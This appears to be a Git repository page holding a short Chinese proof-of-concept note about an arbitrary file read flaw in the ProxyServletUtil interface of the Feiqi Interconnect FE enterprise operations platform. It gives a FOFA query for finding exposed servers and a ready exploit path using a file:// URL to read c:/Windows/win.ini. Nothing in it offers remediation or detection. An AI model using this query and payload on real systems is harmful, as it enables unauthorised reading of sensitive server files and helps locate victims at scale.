POC/wpoc/飞企互联/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

390 B
Raw Blame History

飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞

飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求读取服务器上的敏感文件。

fofa

app="飞企互联-FE企业运营管理平台"

poc

/ProxyServletUtil?url=file:///c:/Windows/win.ini